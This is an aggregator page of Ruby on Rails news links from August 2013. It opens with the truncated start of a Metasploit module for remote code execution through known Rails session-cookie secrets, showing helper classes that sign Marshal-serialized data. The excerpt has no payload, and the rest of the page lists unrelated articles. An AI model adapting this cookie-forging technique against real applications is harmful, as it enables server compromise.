12 Aug '13, 4pm

Ruby on Rails Known Secret Session Cookie Remote Code Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #Helper Classes copy/paste from Rails4
  class MessageVerifier
    class InvalidSignature < StandardError; end

    def initialize(secret, options = {})
      @secret = secret
      @digest = options[:digest] || 'SHA1'
      @serializer = options[:serializer] || Marshal
    end

    def generate(value)
      data = ::Base64.strict_encode64(@serializer.dump(value))
      "#{data}--#{generate_digest(data)}"
    end

    def generate_digest(data)
      require 'openssl' unless defined?(OpenSSL)
      OpenSSL::HMAC.hexdigest(OpenSSL::Digest.const_get(@digest).new, @secret, data)
    end
  end

  class MessageEncryptor
    module NullSerializer
      #...

Full article: http://www.exploit-db.com/exploits/27527/

Tweets

Ruby on Rails Known Secret Session Cookie Remot...

cxsecurity.com 12 Aug '13, 6am

Ruby on Rails Known Secret Session Cookie Remote Code Execution

Ruby on Rails Known Secret Session Cookie Remot...

packetstormsecurity.com 11 Aug '13, 5pm

This Metasploit module implements remote command execution on Ruby on Rails applications. Prerequisite is knowledge of the...

#PacketStorm Ruby on Rails Known Secret Session...

packetstormsecurity.com 11 Aug '13, 6pm

This Metasploit module implements remote command execution on Ruby on Rails applications. Prerequisite is knowledge of the...

[remote exploits] - Ruby on Rails Known Secret ...

1337day.com 11 Aug '13, 6pm

Inj3ct0r is the ultimate database of exploits and vulnerabilities and a great resource for vulnerability researchers and s...

Xavier Noria, a @rails core member, will have a...

This talk explores numbers in Ruby: integers, arbitrary-precision integers, floats, arbitrary-precision decimals, and rati...

NEW POST: Ruby on Rails Interviewing (part 1)

joshuakemp.blogspot.com 12 Aug '13, 8am

Since I am happily hired now, I thought I would spill the beans on my interviewing experience. Now all the things I say, n...

#reddit Log4r for Ruby on Rails: Part I of “Sca...

reddit.com 19 Aug '13, 2pm

Please try to keep submissions on topic and of high quality. Just because it has a computer in it doesn't make it programm...

A startup template for Ruby on Rails 4 applicat...

thechangelog.com 13 Aug '13, 4pm

Way back in January, I wrote a blog post called “Rails has two default stacks” . In it, I discussed how people like to cus...

Starbucks' Secret Menu? (customized drinks)

soshiok.com 13 Aug '13, 1pm

Singapore, August 13, 2013 By Lisa Oon, My Paper Raspberry cheesecake frappuccino, tuxedo mocha, and chocolate pumpkin lat...

After Two Decades of Programming, I Use Rails

toptal.com 16 Aug '13, 5pm

It’s possible that nobody would even know about Ruby if it weren’t for Rails itself. Some people like to belittle Ruby by ...

Double Shot #1181: heroku-new – Command-line pl...

afreshcup.com 16 Aug '13, 11am

is Mike Gunderloy's software development weblog, covering Ruby on Rails and whatever else I find interesting in the univer...

Connecting Ruby & Active Record Without Rails - Guest post by Daniel Friedman @frieddaniel…

Connecting Ruby & Active Record Without Rails -...

blog.flatironschool.com 13 Aug '13, 5pm

Connecting Ruby & Active Record Without Rails The following is a guest post by Daniel Friedman and originally appeared on ...

#freelance #loker Blog website in Ruby On Rails...

freelancer.co.id 11 Aug '13, 7am

I need blog website similar to http://www.androidpit.com/, in Ruby on Rails. I need this done in Rails 3. I will be deploy...

RailsClub'Moscow 2013 – September 28 in Moscow. К...

habrahabr.ru 14 Aug '13, 12pm

– Obie Fernandez (USA), author of the “The Rails Way” book series, founder of Hashrocket – Linda Liukas (USA), Ruby Hero recipient...